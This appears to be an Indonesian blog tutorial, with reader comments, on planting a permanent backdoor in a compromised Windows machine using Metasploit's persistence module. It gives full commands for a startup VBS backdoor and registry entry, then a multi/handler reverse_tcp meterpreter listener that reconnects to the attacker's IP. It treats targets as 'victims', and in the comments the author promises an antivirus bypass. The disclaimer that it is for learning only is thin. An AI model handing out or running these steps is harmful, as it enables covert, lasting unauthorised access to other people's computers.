Sting Category

 

Haloo bro, kali ini saya akan membahas metasploit lagi nih, namun pembahasan kali ini salah satu teknik untuk meninggalkan backdoor didalam sistem target yang sudah terkena exploit, atau bahasa kerennya dalah Maintaining Access.

Tujuan dari Maintaining Access ini adalah untuk meninggalkan pintu masuk (backdoor) yang di tanam pada sistem korban yang nantinya akan membuka suatu kesempatan atau peluang untuk kembali memasuki sistem tersebut kapan saja tanpa harus mengirim backdoor lagi.

Teknik ini dapat dilakukan setelah kita mendapatkan sesi meterpreter dari sistem korban, nahh bagaimana cara mendapatkan sessions meterpreter ?? kalian bisa baca tutorial saya tentang Cara Exploit Windows Menggunakan PDF atau Cara Exploit Windows Menggunakan Ms.Word

Tampilan setelah kita mendapatkan sesi meterpreter
meterpreter sessions

Nah kita akan membuat backdoor tersebut dengan module yang ada di metasploit yaitu persistence
Untuk melihat perintah-perintah  persistance ini ketikkan perintah
run persistence -h
run persistence -h

Selanjutnya kita tanamkan backdor ke sistem korban, dengan perintah
run persistence -U -i 5 -p 443 -r 192.168.1.106
run persistence -U -i 5 -p 443 -r 192.168.1.106

Bisa di lihat dari screenshot diatas, perintah tersebut membuat sebuah backdoor dengan format vbs, dan segaligus membuat sebuah registry untuk backdoor tersebut.

Keterangan :
  • -U: merupakan perintah untuk memulai backdoors ketika sistem start up
  • -i: adalah interval untuk meload backdoor, disini saya isi 5 (detik)
  • -p: adalah port yang digunakan dalam menjalankan listener, disini saya isi port 443
  • -r: IP untuk menghubungkan kembali, 192.168.1.106 (alamat ip attacker)
Selanjutnya kita coba restart system korban untuk memastikan cara ini bekerja
coba reboot

Apabila backdoor sudah tertanam, untuk mengakses sistem korban kita tidak perlu mengirim backdoor kembali, kita langsung bisa menjalankan exploit dengan exploit multi handler
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
Set lhost sesuai yang tadi di input di persistence
set lhost 192.168.1.106
Set lport sesuai juga yang di input di persistence
set lport 443
Lalu jalankan exploit kembali
exploit
exploit

Ternyata berhasil bro,wkwkw meterpreter terbuka kembali :v
ini adalah screenshot setelah  saya masuk ke shell korban :D
shell

ipcofig

Sekian tutorial mengenai Cara Meninggalkan Backdoor Permanen di Windows (Maintaining Access), ini hanya sebuah pembelajaran semata, apabila ada penyalahgunaan dari tutorial ini itu diluar tanggung jawab saya, gunakan ilmu dengan bijak, Terimakasih

Posting Komentar

  1. Balasan
    1. mas kalau ip nya berubah gimana ,masih bisa berfungsi backdoornya?

      Hapus
  2. kang ? , btw, BT 5 r3'nya download dimana ?, perasaan udah punah :/

    BalasHapus
    Balasan
    1. saya pake kali linux kang, cuma pasang tema bt aja :>)

      Hapus
  3. di kali 2.0 gabisa ya mas pasang Tema BT :(

    BalasHapus
    Balasan
    1. belum tau mas, saya sendiri blm install kali 2 =))

      Hapus
  4. bang tau persistence yang bisa jebol AV nda?

    BalasHapus
    Balasan
    1. sampai saat ini memang masih kedetec sama beberapa antivirus mas, nanti kalau udah ada cara bypassnya akan saya update

      Hapus
  5. gan kalo file backdoor nya di hapus sama korban apakah masih bisa konek lagi.?

    BalasHapus
  6. Bos anher, Itu bisa dipakai meski beda jaringan??

    BalasHapus
    Balasan
    1. bisa mas, asal ip yg kita miliki itu tetap, saya pernah mencobanya dg metasploit yg diinstall di vps dan berhasil

      Hapus
  7. cara untuk beda netowrk nya gimana mas? tolong dibikinin tutornya ya mas ^o^

    BalasHapus
  8. gan pas saya jalanin "run persistence -h" not be found gan. kenapa yaa ?

    BalasHapus
  9. stuck di sending payload handler

    BalasHapus

 
Top